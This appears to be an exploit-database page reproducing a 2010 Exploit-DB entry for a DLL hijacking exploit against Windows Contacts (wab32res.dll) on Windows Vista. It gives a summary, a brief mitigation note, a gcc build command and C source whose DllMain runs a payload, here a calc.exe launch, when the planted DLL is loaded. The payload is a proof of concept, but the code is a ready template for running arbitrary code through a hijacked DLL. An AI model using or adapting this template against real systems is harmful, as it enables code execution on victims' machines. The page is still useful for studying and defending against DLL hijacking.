header-logo
Suggest Exploit
vendor:
Windows Contacts
by:
storm
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Windows Contacts
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP2
2010

Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)

This exploit allows an attacker to execute arbitrary code on a vulnerable system by hijacking a Windows Contacts DLL file. The vulnerable file is wab32res.dll, which is used to open .contact, .group, .p7c, .vcf, and .wab files. The exploit code is written in C and compiled into a shared library. When the vulnerable file is loaded, the malicious code is executed.

Mitigation:

Ensure that the vulnerable file is not writable by any user or process. Additionally, ensure that the vulnerable file is not loaded from any untrusted source.
Source

Exploit-DB raw data:

/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}

Navigation

Suggest Exploit

Services By CQR